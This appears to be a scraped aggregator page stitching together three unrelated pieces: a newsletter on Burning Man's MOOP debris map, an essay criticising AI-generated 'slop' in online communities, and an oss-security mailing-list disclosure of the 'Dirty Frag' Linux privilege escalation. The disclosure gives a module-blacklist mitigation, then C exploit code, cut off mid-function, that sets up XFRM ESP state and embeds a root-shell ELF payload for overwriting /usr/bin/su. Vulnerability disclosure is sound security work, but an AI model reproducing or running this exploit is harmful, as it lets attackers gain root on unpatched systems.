10 interesting stories served every morning and every evening.

The map that keeps Burning Man honest

www.not-ship.com

At the end of April, I ran a short cam­paign to find 15 more pay­ing mem­bers of Not-Ship. And we did it! Thank you to the won­der­ful souls who chose to back this work. It means the world to me.

💙 Amanda

Each year, 70,000 peo­ple gather on a dry lakebed in Nevada to build a city from scratch. This is Black Rock City, home to the in­fa­mous Burning Man event. Eight days later, it’s gone.

But 150 peo­ple re­main. They line up — side by side, an arms width apart — and slowly walk the 3,800 acres (15.4 km²) of dusty playa. They’re look­ing for MOOP: Matter Out of Place. A screw, a se­quin, a cig­a­rette butt.

This foren­sic-style sweep takes weeks; every­thing they find is re­moved and logged. At the end, they’re left with a re­mark­able ac­count­ing of what 70,000 peo­ple left be­hind: The MOOP Map. And I’m ob­sessed.

The Burning Man 2025 MOOP Map

Indicates ef­fort and time spent on MOOP cleanup across Black Rock City.

The map is colour-coded by sever­ity of cleanup. Yellow in­di­cates mod­er­ate MOOP con­di­tions, where crews slow their pace to make sure noth­ing is missed. Red are the zones most heav­ily af­fected — dif­fi­cult enough to stop progress en­tirely.

In sim­ple terms, the MOOPier an area is, the more labour and field time it takes to clean un­til crews are no longer find­ing de­bris,” Dominic Tinio, who goes by DA, ex­plained to me. As Burning Man’s Environmental Restoration Manager, he’s in charge of the MOOP process.

The fu­ture of the com­mu­nity de­pends on get­ting this right. Black Rock City is only al­lowed to re­turn to the playa each year if it passes a strict post-event in­spec­tion from the Bureau of Land Management (BLM): No more than one square foot of de­bris can re­main per acre (0.23 m²/​ha).

Average yearly de­bris found by the MOOP, 2006 to 2025

The BLM tests the playa at 120 points across the site; no more than 12 can ex­ceed the one square foot per acre limit. In most years, Burning Man passes com­fort­ably — but not al­ways. In 2023, 11 of those 120 tests came back over the thresh­old, the clos­est the event has come to fail­ing in re­cent mem­ory.

During cleanup, the MOOP team also doc­u­ments what kind of de­bris they find. In 2025, lag bolts were by far the biggest prob­lem. They an­chor tents, art pieces, and other in­fra­struc­ture into the ground, and can eas­ily dis­ap­pear be­neath the dust.

Lots of lag bolts, not many cig­a­rette butts

Types of de­bris found dur­ing the 2025 MOOP.

Since the MOOP is so metic­u­lous, the team can de­ter­mine whether de­bris prob­lems are wide­spread or iso­lated. For lag bolts? There’s no main cul­prit; every­one is just miss­ing a few.

The MOOP Map is about shared re­spon­si­bil­ity in our use of the land,” said DA. In ad­di­tion to help­ing up­hold the BLM stan­dards, it helps par­tic­i­pants, camps, and art pro­jects un­der­stand their im­pact.”

Groups in MOOP-heavy ar­eas re­ceive a break­down of what was found on their foot­print, with the hope they will im­prove the fol­low­ing year. Persistent or se­ri­ous of­fend­ers are flagged to the team re­spon­si­ble for as­sign­ing camps their fu­ture spots in Black Rock City.

And while it’s not the MOOP Map’s aim, its re­lease in­evitably fu­els a bit of pub­lic fin­ger-point­ing. The MOOP Map shame thread” on Reddit calls out in­di­vid­ual camps that per­form poorly.

The MOOP Map has been around for two decades. Over that time, the data show a rel­a­tively clear pic­ture. Since 2006, over the long arc of the MOOP Map, the most strik­ing trend is that the com­mu­nity has steadily im­proved at Leave No Trace, even as Black Rock City has grown dra­mat­i­cally in size, com­plex­ity, and pop­u­la­tion,” says DA.

MOOP per per­son peaked in 2010

Debris per 10,000 peo­ple, 2006 to 2025.

Leave No Trace is one of Burning Man’s ten guid­ing prin­ci­ples. Principles are easy to de­clare. But the MOOP Map makes it some­thing the com­mu­nity ac­tu­ally has to face. After 20 years, DA is con­fi­dent it’s work­ing.

The strongest ef­fect of the MOOP Map is that it dri­ves im­prove­ment. Year af­ter year, the com­mu­nity ad­justs, learns, and re­turns bet­ter pre­pared to leave no trace.”

KEEP ON KEEPING ON

While the Not-Ship mem­ber drive is over (for now), this work con­tin­ues to run on reader sup­port. But af­ter two weeks of writ­ing pay if you love this work” emails, I’m tired. All my pitches have been pitched. So I’ll just leave the but­ton here, and trust you know what to do with it.

FROM ELSEWHERE

Here’s what I found in­ter­est­ing, im­por­tant or de­light­ful this week:

Marblelous mu­sic. Wintergatan is a quirky in­stru­ment that re­lies heav­ily on mar­bles to make mu­sic. It’s beau­ti­ful to watch, and does­n’t sound any­thing like you ex­pect.

The in­fi­nite buf­falo sen­tence. It’s a gram­mat­i­cally cor­rect sen­tence, us­ing just the word buf­falo. The video ex­pla­na­tion ben­e­fits from some use­ful vi­su­als, but you’ll still prob­a­bly hate this. Or ab­solutely love it. There’s def­i­nitely no mid­dle ground here.

MORE NOT-SHIP

Banks are fund­ing cli­mate chaos. You don’t have to.

Switching banks could be one of the most cli­mate-friendly de­ci­sions you make.

Not-ShipAmanda Shendruk

When do most peo­ple have the day off?

It’s not the day you think.

Not-ShipAmanda Shendruk

Birds might help us get through this

The men­tal health ben­e­fits of joy watch­ing” are what we need right now.

Not-ShipAmanda Shendruk

AI Slop is Killing Online Communities

rmoff.net

Like a young child com­ing home from kinder­garten with their lat­est crayon scrawls, the in­ter­net is cur­rently awash with peo­ple shar­ing their AI-generated work. And just like the young child’s draw­ings, much of that work should be proudly put up on the walls within the artist’s house—and no fur­ther.

Prologue: I ❤️ AI 🔗

It’s just that I know when to keep my crayon-draw­ings to my­self ;) And I am get­ting in­creas­ingly sad and frus­trated see­ing com­mu­ni­ties that I value slowly wilt­ing un­der the on­slaught of shit. Often that shit is per­haps naïvely shared with no dele­te­ri­ous in­tent, but shit nonethe­less it is.

Congratulations, you en­tered a prompt and pressed re­turn. 🔗

I rewrote Kafka in COBOL

I rewrote Kafka in COBOL

Great, en­ter it at your next sci­ence fair. Meanwhile stop beg­ging for stars on your brand new GitHub repo that no-one’s touch­ing with a barge­pole.

I wrote a blog post about Kafka”

I wrote a blog post about Kafka”

Did you though? We can tell that Claude wrote it, and it’s a piece of garbage.

I made this video about Kafka”

I made this video about Kafka”

Cool story bro. Except AI made it, and it’s only of in­ter­est as a cu­rios­ity, not a use­ful learn­ing arte­fact.

I’m self-pub­lish­ing an ebook that I wrote about Kafka”

I’m self-pub­lish­ing an ebook that I wrote about Kafka”

What you mean is, you got Claude to scrape the in­ter­net and crap out a book” that you should be ashamed to give away for free.

Any fool can feed coins into a fruit ma­chine and pull the arm.

Step 0: Profit 🔗

The pat­tern I see over and over seems to be:

Step 1: Discover agen­tic cod­ing. Mind blown.

Step 1: Discover agen­tic cod­ing. Mind blown.

Step 2: Chuck a pro­ject up onto GitHub (if it’s ac­tu­ally up </snark>).

Step 2: Chuck a pro­ject up onto GitHub (if it’s ac­tu­ally up </snark>).

Step 3: Have AI write a breath­less blog post about your vibe-coded pro­ject. Share blog post and repo to any sub­red­dit and Slack group that you can find. Not sure which is suit­able? Post to all of them—peo­ple will love to see it! /s

Step 3: Have AI write a breath­less blog post about your vibe-coded pro­ject. Share blog post and repo to any sub­red­dit and Slack group that you can find. Not sure which is suit­able? Post to all of them—peo­ple will love to see it! /s

Let me tell you now: pause af­ter step 2. Take a re­ally long breath. Think re­ally hard about what you’ve cre­ated, and why you want to share it. If it’s because it’s cool” then I’ve got news for you: agen­tic cod­ing is no longer a nov­elty. It’s just how shit gets done now.

If you can think of the prompt, AI can write it. Big deal. That’s so early-2026. Move on.

Still want to share it far and wide? Is it ac­tu­ally use­ful? Are you us­ing it? Has it got re­ally good doc­u­men­ta­tion? Is it us­able? Have you ac­tu­ally come back to the code again and again and put it through its paces? Or was it a one-night stand with Claude and the next morn­ing nei­ther of you thinks it was such a good idea?

Still want to share it? If it’s soft­ware, are you pre­pared to stand be­hind it as some­thing peo­ple will raise is­sues against, maybe sub­mit PRs for? If it’s writ­ten, is it some­thing you’d want to read? Is it ac­tu­ally adding to the cu­mu­la­tive un­der­stand­ing of the com­mu­nity, or is it just an LLM auto-com­plet­ing its way through text that you can’t be ar­sed to write and I can’t be ar­sed to read?

Who cares? 🔗

No one forces me to read this stuff. Why am I so both­ered by it?

Because like bindweed, it’s slowly stran­gling the or­ganic life out of com­mu­ni­ties. When I open up Reddit now, it’s in­creas­ingly over­run with vibe-coded AI stuff. Whilst much of it is well-in­ten­tioned I’m sure, it does noth­ing to con­tribute to the com­mu­nity.

AI slop is dri­ving up the noise, and mak­ing the sig­nal more and more dif­fi­cult to dis­cern in com­mu­ni­ties. This risks be­com­ing a down­ward spi­ral; as com­mu­ni­ties be­come more pol­luted by this stuff, mem­bers will get frus­trated from wad­ing through AI slop and draw back, thus di­min­ish­ing the life of the or­ganic com­mu­nity even fur­ther.

Carrying on like this, on­line com­mu­ni­ties will ei­ther wither and die, or con­verge on some­thing like the dystopian-but-ba­nal MoltBook in which AI agents talk” to each other with no hu­mans pre­sent.

There’s good slop’ and bad slop 🔗

You may have no­ticed that AI Slop has be­come the mot du jour.

The broad use of the term that I’m gen­er­ally fa­mil­iar with is as a neg­a­tive de­scrip­tion for low-ef­fort ma­te­r­ial cre­ated by AI and foisted upon those to whom it is of no ben­e­fit. However I learnt re­cently that there are those—prob­a­bly cor­re­lat­ing strongly with the AI-hating crowd—who brand any­thing writ­ten about AI as AI Slop”, even if not writ­ten by AI.

Material cre­ated with the as­sis­tance of AI is not bad in it­self. It’s the pur­pose to which it’s put.

A good use of AI is when it en­ables peo­ple to do some­thing they could­n’t do be­fore, to con­tribute to a com­mu­nity when they could­n’t be­fore. Done with the care and good in­tent of a hu­man be­hind it, this is a nett pos­i­tive.

Bad AI slop, on the other hand, is mon­keys throw­ing crap over the fence for a pur­pose other than fur­ther­ing the com­mu­nity. This in­cludes spam, en­gage­ment farm­ing, and sim­ply thought­less noise in a space which is not for that pur­pose.

OK, but who made you gate­keeper of the in­ter­net? 🔗

The stan­dards of com­mon de­cency and taste, that’s who.

Let’s take a step back. Sharing con­tent on­line is won­der­ful. It’s pretty much what made the in­ter­net what it is to­day.

The knack is to un­der­stand what you’re shar­ing, to whom, and why.

If you were born be­fore around 1980 you’ll know that there was the Geocities era. Every high-school nerd had a home­page (mine was in Vienna since you’re ask­ing).

Just be­cause I built a home­page on Geocities, com­plete with Under Construction’ anigifs, a web counter and a web ring ban­ner, does not mean that I should be shar­ing it to any­one who’ll lis­ten. Amongst my friends, sure. My par­ents, of course—they’ll be proud of any­thing I build. But to the gen­eral in­ter­net? Who cares.

And now with AI-generated con­tent, whether a vibe-coded app or a blog post, the same ap­plies. The in­ter­net went through a col­lec­tive con­vul­sion in early 2026 as every­one dis­cov­ered the power of Claude Opus 4.5 (and don’t get me wrong, it is damn cool). And what does any­one do when they dis­cover any­thing neat? They want to share it with their friends!

Combine that with the deaf­en­ing AI-hype ma­chine of grifters al­ready in over­drive—and sud­denly sub­red­dits and Slacks are over­run with AI-generated ma­te­r­ial.

Built with AI, not by AI 🔗

This ex­cel­lent sec­tion head­ing is taken from my friend and col­league Gunnar Morling’s re­cent ar­ti­cle. As I out­lined above, AI is a pow­er­ful tool, and I will ar­gue with any­one for the case that it’s pretty much a dere­lic­tion of one’s job to not be in­clud­ing it in one’s tool­box. Gunnar nails the nu­ance though:

Build with AI.

AI is just a tool.

You need to do the think­ing, the in­struct­ing, the check­ing.

Gunnar has built a fan­tas­tic new pro­ject (Hardwood; a new parser for Apache Parquet), us­ing AI. Does that mean it falls foul of my wrath and judge­ment? No, of course not. It’s a pro­ject that’s taken four months so far, with a solid roadmap, a bur­geon­ing com­mu­nity, and a thought­ful and care­ful de­sign be­hind it.

Contribution 🔗

Does your of­fer­ing con­tribute any­thing to the com­mu­nity?

If you boil it down to its es­sen­tials, is what you’re shar­ing any­thing other than the man­i­fes­ta­tion of a prompt fed into an agen­tic cod­ing tool? If I took your prompt and ran it, would I end up with some­thing sim­i­lar? Prompt en­gi­neer­ing is fun and an in­ter­est­ing study, but it’s tan­gen­tial to the sub­ject it­self. Consider a com­mu­nity of or­nate fur­ni­ture en­thu­si­asts (I’m sure such a thing ex­ists); it’s the equiv­a­lent of bom­bard­ing them with Ikea-esque pieces sim­ply be­cause you’ve got a re­ally in­ter­est­ing set of chis­els that you want to show off.

Just like I’m not post­ing my kid’s draw­ings off to the National Gallery just yet, I’m also not shar­ing every cool app that I can build with Claude. Not that software is art” (though some of the best ac­tu­ally is), but there’s noth­ing much in­ter­est­ing in the puerile out­put of a process. Anyone with a few to­kens can prompt their way to a bit of soft­ware. Throwaway tools are just fine. They’re great, in fact—the in­ter­net is built on weird lit­tle scripts that peo­ple have built and shared. But chuck them on gist/​GitHub—they don’t need a launch blog post as if you’re the in­car­na­tion of Steve Jobs.

This is a tale as old as time. Well, the in­ter­net any­way, once it got be­yond ARPANET and BBSes.

Whether Usenet, Reddit, lob­ste.rs, or any other on­line plat­form, the ne­ti­quette is al­ways to lurk”. Hang around, read what gets writ­ten, get a feel for the vibe”.

I’m not the ar­biter of what’s ac­cept­able in a given com­mu­nity. The com­mu­nity mem­bers are. Vibed an amaz­ing new im­ple­men­ta­tion of the Kafka pro­to­col, but not sure if peo­ple want to see it? Read the room, and get a feel for whether they’ll wel­come with open arms your AI slop—or not. If in doubt, ask!

As well as lurk­ing, an­other way of show­ing re­spect to the com­mu­nity is to be very open and clear about if, how, and where you’re us­ing AI in your con­tri­bu­tion.

The Asymmetry of Bullshit 🔗

What’s the im­pact on oth­ers of your con­tri­bu­tion?

The amount of en­ergy needed to re­fute bull­shit is an or­der of mag­ni­tude big­ger than that needed to pro­duce it.

The amount of en­ergy needed to re­fute bull­shit is an or­der of mag­ni­tude big­ger than that needed to pro­duce it.

If you splurge out a gob­blede­gook ar­ti­cle, you’re putting that work­load onto your reader to re­alise that it’s not worth wad­ing through. If you dump a com­plex PR into a pro­ject with­out due care, you’re oblig­at­ing the re­view­ers to go through the code and for them to ex­plain to you why it can’t be merged. In both of these sce­nar­ios the com­mu­nity would be bet­ter off with­out your con­tri­bu­tion.

Pre-AI, the ef­fort re­quired for con­tri­bu­tions was suf­fi­cient proof of work to ei­ther de­ter peo­ple or demon­strate an ac­tual com­mit­ment. Communities could deal with sub-par con­tri­bu­tions. Those well-in­ten­tioned and will­ing to learn could be men­tored and of­ten would de­velop into im­por­tant mem­bers of the com­mu­nity. Those less well-in­ten­tioned and not do­ing much more than spam­ming could be dealt with be­cause the vol­ume was so low.

With great power… 🔗

or per­haps that should be With a great num­ber of to­kens”

Communities are pow­er­ful yet frag­ile things. Don’t be the bindweed that suf­fo­cates the life out of them.

Explore with great joy the power that LLMs and agen­tic cod­ing tools bring. Enjoy the fris­son of jfc that is cool that it in­vari­ably brings.

But re­spect the com­mu­nity, and only share what is truly rel­e­vant. Save the crayon pic­tures for your kitchen fridge.

Bindweed photo by Joshua Ralph on Unsplash.

Bindweed photo by Joshua Ralph on Unsplash.

All other pic­tures by my kids. Which is ironic, given my ex­hort­ing for peo­ple to lit­er­ally keep their child­ish draw­ings to them­selves ;)

All other pic­tures by my kids. Which is ironic, given my ex­hort­ing for peo­ple to lit­er­ally keep their child­ish draw­ings to them­selves ;)

security - Dirty Frag: Universal Linux LPE

www.openwall.com

Products

Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   pass­word cracker

Free & Open Source for any plat­form in the cloud Pro for Linux Pro for ma­cOS

Wordlists   for pass­word crack­ing pass­wdqc   pol­icy en­force­ment

Free & Open Source for Unix Pro for Windows (Active Directory)

yescrypt   KDF & pass­word hash­ing yespower   Proof-of-Work (PoW) cryp­t_blow­fish   pass­word hash­ing ph­pass   ditto in PHP tcb   bet­ter pass­word shad­ow­ing Pluggable Authentication Modules scan­logd   port scan de­tec­tor popa3d   tiny POP3 dae­mon blists   web in­ter­face to mail­ing lists msu­lo­gin   sin­gle user mode lo­gin ph­p_mt_seed   mt_rand() cracker

Openwall GNU/*/Linux   server OS

Linux Kernel Runtime Guard

John the Ripper   pass­word cracker

Free & Open Source for any plat­form in the cloud Pro for Linux Pro for ma­cOS

Free & Open Source for any plat­form

in the cloud

Pro for Linux

Pro for ma­cOS

Wordlists   for pass­word crack­ing

pass­wdqc   pol­icy en­force­ment

Free & Open Source for Unix Pro for Windows (Active Directory)

Free & Open Source for Unix

Pro for Windows (Active Directory)

yescrypt   KDF & pass­word hash­ing

yespower   Proof-of-Work (PoW)

cryp­t_blow­fish   pass­word hash­ing

ph­pass   ditto in PHP

tcb   bet­ter pass­word shad­ow­ing

Pluggable Authentication Modules

scan­logd   port scan de­tec­tor

popa3d   tiny POP3 dae­mon

blists   web in­ter­face to mail­ing lists

msu­lo­gin   sin­gle user mode lo­gin

ph­p_mt_seed   mt_rand() cracker

Services

Publications

Articles Presentations

Articles

Presentations

Resources

Mailing lists Community wiki Source code repos­i­to­ries (GitHub) File archive & mir­rors How to ver­ify dig­i­tal sig­na­tures OVE IDs

Mailing lists

Community wiki

Source code repos­i­to­ries (GitHub)

File archive & mir­rors

How to ver­ify dig­i­tal sig­na­tures

OVE IDs

What’s new

Message-ID: <afzgS2SCWNcZU3vU@v4bel> Date: Fri, 8 May 2026 03:56:11 +0900 From: Hyunwoo Kim <imv4bel@…il.com> To: oss-se­cu­rity@…ts.open­wall.com Cc: imv4­bel@…il.com Subject: Dirty Frag: Universal Linux LPE

Hi,

This is a re­port on Dirty Frag”, a uni­ver­sal LPE that al­lows ob­tain­ing root priv­i­leges on all ma­jor dis­tri­b­u­tions.

This vul­ner­a­bil­ity has a sim­i­lar im­pact to the pre­vi­ous Copy Fail.

Because the em­bargo has now been bro­ken, no patches or CVEs ex­ist for these vul­ner­a­bil­i­ties. After con­sul­ta­tion with the linux-dis­tros@…open­wall.org main­tain­ers, and at the main­tain­ers’ re­quest, I am pub­licly re­leas­ing this Dirty Frag doc­u­ment.

As with the pre­vi­ous Copy Fail vul­ner­a­bil­ity, Dirty Frag like­wise al­lows im­me­di­ate root priv­i­lege es­ca­la­tion on all ma­jor dis­tri­b­u­tions, and it chains two sep­a­rate vul­ner­a­bil­i­ties:

- https://​git.ker­nel.org/​pub/​scm/​linux/​ker­nel/​git/​net­dev/​net.git/​com­mit/?​id=f4c50a4034e62ab75f1d5cd­d191d­d5f9c77fdff4 - https://​lore.ker­nel.org/​all/​afKV2z­GR6r­relPC7@v4­bel/

Because the re­spon­si­ble dis­clo­sure sched­ule and em­bargo have been bro­ken, no patches ex­ist for any dis­tri­b­u­tion. Use the fol­low­ing com­mand to re­move the mod­ules in which the vul­ner­a­bil­i­ties oc­cur: ``` sh -c printf install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n’ > /etc/modprobe.d/dirtyfrag.conf; rm­mod esp4 esp6 rxrpc 2>/dev/null; true” ```

For de­tailed tech­ni­cal in­for­ma­tion about the vul­ner­a­bil­i­ties and the rea­son the em­bargo was bro­ken, please check https://​dirtyfrag.io.

Full ex­ploit code: ```c #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sched.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/uio.h> #include <sys/ioctl.h> #include <sys/wait.h> #include <netinet/in.h> #include <arpa/inet.h> #include <net/if.h> #include <linux/if.h> #include <linux/netlink.h> #include <linux/rtnetlink.h> #include <linux/xfrm.h>

#ifndef UDP_ENCAP #define UDP_ENCAP 100 #endif #ifndef UDP_ENCAP_ESPINUDP #define UDP_ENCAP_ESPINUDP 2 #endif #ifndef SOL_UDP #define SOL_UDP 17 #endif

#define ENC_PORT 4500 #define SEQ_VAL 200 #define REPLAY_SEQ 100 #define TARGET_PATH /usr/bin/su” #define PATCH_OFFSET 0 /* over­write whole ELF start­ing at file[0] */ #define PAYLOAD_LEN 192 /* bytes of shel­l_elf to write (48 trig­gers) */ #define ENTRY_OFFSET 0x78 /* shell­code en­try in­side the new ELF */

/* * 192-byte min­i­mal x86_64 root-shell ELF. * _start at 0x400078: * set­gid(0); se­tuid(0); set­groups(0, NULL); * ex­ecve(“/​bin/​sh”, NULL, [“TERM=xterm”, NULL]); * PT_LOAD cov­ers 0xb8 bytes (the ac­tual con­tent) at vaddr 0x400000 R+X. * * Setting TERM in the new shel­l’s env si­lences the * tput: No value for $TERM / test: : in­te­ger ex­pected” noise * /etc/bash.bashrc and friends emit when TERM is un­set. * * Code (from off­set 0x78): * 31 ff xor edi, edi * 31 f6 xor esi, esi * 31 c0 xor eax, eax * b0 6a mov al, 0x6a  ; set­gid * 0f 05 syscall * b0 69 mov al, 0x69  ; se­tuid * 0f 05 syscall * b0 74 mov al, 0x74  ; set­groups * 0f 05 syscall * 6a 00 push 0  ; envp[1] = NULL * 48 8d 05 12 00 00 00 lea rax, [rip+0x12]  ; rax = TERM=xterm” * 50 push rax  ; envp[0] * 48 89 e2 mov rdx, rsp  ; rdx = envp * 48 8d 3d 12 00 00 00 lea rdi, [rip+0x12]  ; rdi = /bin/sh” * 31 f6 xor esi, esi  ; rsi = NULL (argv) * 6a 3b 58 push 0x3b ; pop rax  ; rax = 59 (execve) * 0f 05 syscall  ; ex­ecve(“/​bin/​sh”,NULL,envp) * TERM=xterm\0″ (offset 0xa5..0xaf) * /bin/sh\0” (offset 0xb0..0xb7) */ sta­tic const uin­t8_t shel­l_elf[PAY­LOAD­_LEN] = { 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a, 0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12, 0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6, 0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00, 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, };

ex­tern int g_­su_ver­bose; int g_­su_ver­bose = 0; #define SLOG(fmt, …) do { if (g_su_verbose) fprintf(stderr, [su] fmt \n”, ##__VA_ARGS__); } while (0)

sta­tic int write_proc(const char *path, const char *buf) { int fd = open(path, O_WRONLY); if (fd < 0) re­turn -1; int n = write(fd, buf, strlen(buf)); close(fd); re­turn n; }

sta­tic void set­up_usern­s_netns(void) { uid_t re­al_uid = ge­tuid(); gid_t re­al_gid = get­gid(); if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { SLOG(“unshare: %s”, str­error(er­rno)); exit(1); } write_proc(“/​proc/​self/​set­groups”, deny”); char map[64]; snprintf(map, sizeof(map), 0 %u 1″, re­al_uid); if (write_proc(“/proc/self/uid_map”, map) < 0) { SLOG(“uid_map: %s”, str­error(er­rno)); exit(1); } snprintf(map, sizeof(map), 0 %u 1”, re­al_gid); if (write_proc(“/proc/self/gid_map”, map) < 0) { SLOG(“gid_map: %s”, str­error(er­rno)); exit(1); } int s = socket(AF_INET, SOCK_DGRAM, 0); if (s < 0) { SLOG(“socket: %s”, str­error(er­rno)); exit(1); } struct ifreq ifr; mem­set(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_­name, lo”, IFNAMSIZ); if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) { SLOG(“SIOCGIFFLAGS: %s”, str­error(er­rno)); exit(1); } ifr.ifr_flags |= IFF_UP | IFF_RUNNING; if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) { SLOG(“SIOCSIFFLAGS: %s”, str­error(er­rno)); exit(1); } close(s); }

sta­tic void put_attr(struct nlms­ghdr *nlh, int type, const void *data, size_t len) { struct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len)); rta->rta_­type = type; rta->rta_len = RTA_LENGTH(len); mem­cpy(RTA_­DATA(rta), data, len); nlh->nlms­g_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len); }

sta­tic int ad­d_xfr­m_sa(uin­t32_t spi, uin­t32_t patch_se­qhi) { int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); if (sk < 0) re­turn -1; struct sock­ad­dr_nl nl = { .nl_family = AF_NETLINK }; if (bind(sk, (struct sock­addr*)&nl, sizeof(nl)) < 0) { close(sk); re­turn -1; }

char buf[4096] = {0}; struct nlms­ghdr *nlh = (struct nlms­ghdr *)buf; nlh->nlms­g_­type = XFRM_MSG_NEWSA; nlh->nlms­g_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlms­g_pid = get­pid(); nlh->nlms­g_seq = 1; nlh->nlms­g_len = NLMSG_LENGTH(sizeof(struct xfr­m_user­sa_info));

struct xfr­m_user­sa_info *xs = (struct xfr­m_user­sa_info *)NLMSG_DATA(nlh); xs->id.daddr.a4 = in­et_addr(“127.0.0.1”); xs->id.spi = htonl(spi); xs->id.proto = IPPROTO_ESP; xs->saddr.a4 = in­et_addr(“127.0.0.1″); xs->fam­ily = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->re­play_win­dow = 0; xs->re­qid = 0x1234; xs->flags = XFRM_STATE_ESN; xs->lft.soft­_byte_limit = (uint64_t)-1; xs->lft.hard_byte_limit = (uint64_t)-1; xs->lft.soft­_­pack­et_limit = (uint64_t)-1; xs->lft.hard_­pack­et_limit = (uint64_t)-1; xs->sel.fam­ily = AF_INET; xs->sel.pre­fixlen_d = 32; xs->sel.pre­fixlen_s = 32; xs->sel.daddr.a4 = in­et_addr(“127.0.0.1”); xs->sel.saddr.a4 = in­et_addr(“127.0.0.1″);

{ char al­g_buf[sizeof(struct xfr­m_al­go­_auth) + 32]; mem­set(al­g_buf, 0, sizeof(al­g_buf)); struct xfr­m_al­go­_auth *aa = (struct xfr­m_al­go­_auth *)alg_buf; strncpy(aa->al­g_­name, hmac(sha256)”, sizeof(aa->al­g_­name)-1); aa->al­g_key_len = 32 * 8; aa->al­g_trunc_len = 128; mem­set(aa->al­g_key, 0xAA, 32); put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, al­g_buf, sizeof(al­g_buf)); } { char al­g_buf[sizeof(struct xfr­m_algo) + 16]; mem­set(al­g_buf, 0, sizeof(al­g_buf)); struct xfr­m_algo *ea = (struct xfr­m_algo *)alg_buf; strncpy(ea->al­g_­name, cbc(aes)”, sizeof(ea->al­g_­name)-1); ea->al­g_key_len = 16 * 8; mem­set(ea->al­g_key, 0xBB, 16); put_attr(nlh, XFRMA_ALG_CRYPT, al­g_buf, sizeof(al­g_buf)); } { struct xfr­m_en­cap_tmpl enc; mem­set(&enc, 0, sizeof(enc)); enc.en­cap_­type = UDP_ENCAP_ESPINUDP; enc.en­cap_s­port = htons(ENC_­PORT); enc.en­cap_d­port = htons(ENC_­PORT); enc.en­cap_oa.a4 = 0; put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc)); } { char es­n_buf[sizeof(struct xfr­m_re­play_s­tate_esn) + 4]; mem­set(es­n_buf, 0, sizeof(es­n_buf)); struct xfr­m_re­play_s­tate_esn *esn = (struct xfr­m_re­play_s­tate_esn *)esn_buf; esn->bm­p_len = 1; esn->oseq = 0; esn->seq = REPLAY_SEQ; esn->os­e­q_hi = 0; esn->se­q_hi = patch_se­qhi; esn->re­play_win­dow = 32; put_attr(nlh, XFRMA_REPLAY_ESN_VAL, es­n_buf, sizeof(es­n_buf)); }

if (send(sk, nlh, nlh->nlms­g_len, 0) < 0) { close(sk); re­turn -1; } char rbuf[4096]; int n = recv(sk, rbuf, sizeof(rbuf), 0); if (n < 0) { close(sk); re­turn -1; } struct nlms­ghdr *rh = (struct nlms­ghdr *)rbuf; if (rh->nlmsg_type == NLMSG_ERROR) { struct nlms­gerr *e = NLMSG_DATA(rh); if (e->error) { close(sk); re­turn -1; } } close(sk); re­turn 0; }

sta­tic int do_one_write(const char *path, of­f_t off­set, uin­t32_t spi) { int sk_recv = socket(AF_INET, SOCK_DGRAM, 0); if (sk_recv < 0) re­turn -1; int one = 1; set­sock­opt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)); struct sock­ad­dr_in sa_d = { .sin_family = AF_INET, .sin_port = htons(ENC_­PORT), .sin_addr = { in­et_addr(“127.0.0.1”) }, }; if (bind(sk_recv, (struct sock­addr*)&sa_d, sizeof(sa_d)) < 0) { close(sk_recv); re­turn -1; } int en­cap = UDP_ENCAP_ESPINUDP; if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(en­cap)) < 0) { close(sk_recv); re­turn -1; } int sk_send = socket(AF_INET, SOCK_DGRAM, 0); if (sk_send < 0) { close(sk_recv); re­turn -1; } if (connect(sk_send, (struct sock­addr*)&sa_d, sizeof(sa_d)) < 0) { close(sk_send); close(sk_recv); re­turn -1; } int file_fd = open(path, O_RDONLY); if (file_fd < 0) { close(sk_send); close(sk_recv); re­turn -1; }

int pfd[2]; if (pipe(pfd) < 0) { close(file_fd); close(sk_send); close(sk_recv); re­turn -1; }

